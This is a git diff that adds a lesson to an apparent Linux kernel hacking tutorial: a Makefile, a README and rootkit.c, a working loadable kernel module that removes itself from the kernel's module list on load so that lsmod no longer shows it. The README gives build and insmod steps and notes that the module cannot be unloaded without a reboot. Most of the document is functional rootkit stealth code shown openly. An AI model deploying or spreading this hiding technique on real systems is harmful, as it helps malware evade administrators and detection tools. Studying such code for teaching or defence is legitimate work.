diff --git a/3_RootkitTechniques/3.0_hiding_lkm/Makefile b/3_RootkitTechniques/3.0_hiding_lkm/Makefile
new file mode 100644
index 0000000..1856805
--- /dev/null
+++ b/3_RootkitTechniques/3.0_hiding_lkm/Makefile
@@ -0,0 +1,7 @@
+obj-m += rootkit.o
+
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
diff --git a/3_RootkitTechniques/3.0_hiding_lkm/README.md b/3_RootkitTechniques/3.0_hiding_lkm/README.md
new file mode 100644
index 0000000..34e0e39
--- /dev/null
+++ b/3_RootkitTechniques/3.0_hiding_lkm/README.md
@@ -0,0 +1,13 @@
+# Linux Kernel Hacking
+
+## 3.0: Hiding Kernel Modules
+
+Hide a kernel module after loading it
+
+To use:
+* Build with `make`
+* Load with `insmod rootkit.ko`
+* Check output in kernel buffer with `dmesg`
+* See that the module is missing from the output of `lsmod`
+
+> NOTE: Currently, you can't unload this kernel module without rebooting
diff --git a/3_RootkitTechniques/3.0_hiding_lkm/rootkit.c b/3_RootkitTechniques/3.0_hiding_lkm/rootkit.c
new file mode 100644
index 0000000..acc811f
--- /dev/null
+++ b/3_RootkitTechniques/3.0_hiding_lkm/rootkit.c
@@ -0,0 +1,51 @@
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/syscalls.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("TheXcellerator");
+MODULE_DESCRIPTION("Hiding LKMs");
+MODULE_VERSION("0.01");
+
+/* list_head is a doubly-linked list structure used by the kernel
+ * It's got a .prev and .next field, but we can use the list_del()
+ * and list_add() functions add/remove items from a list_head struct.
+ * The only thing to keep in mind is that we need to keep a local copy
+ * of the item that we remove so we can add it back later when we're done.
+ */
+static struct list_head *prev_module;
+static short hidden = 0;
+
+void showme(void)
+{
+	/* Add the saved list_head struct back to the module list */
+	list_add(&THIS_MODULE->list, prev_module);
+	hidden = 0;
+}
+
+void hideme(void)
+{
+	/* Save the module in the list before us, so we can add ourselves
+	 * back to the list in the same place later. */
+	prev_module = THIS_MODULE->list.prev;
+	/* Remove ourselves from the list module list */
+	list_del(&THIS_MODULE->list);
+	hidden = 1;
+}
+
+static int __init rootkit_init(void)
+{
+	printk(KERN_INFO "Rootkit Loaded >:-)\n");
+	hideme();
+	return 0;
+}
+
+static void __exit rootkit_exit(void)
+{
+	/* Note that you won't be able to unload this LKM yet... */
+	printk(KERN_INFO "Goodbye, World!\n");
+}
+
+module_init(rootkit_init);
+module_exit(rootkit_exit);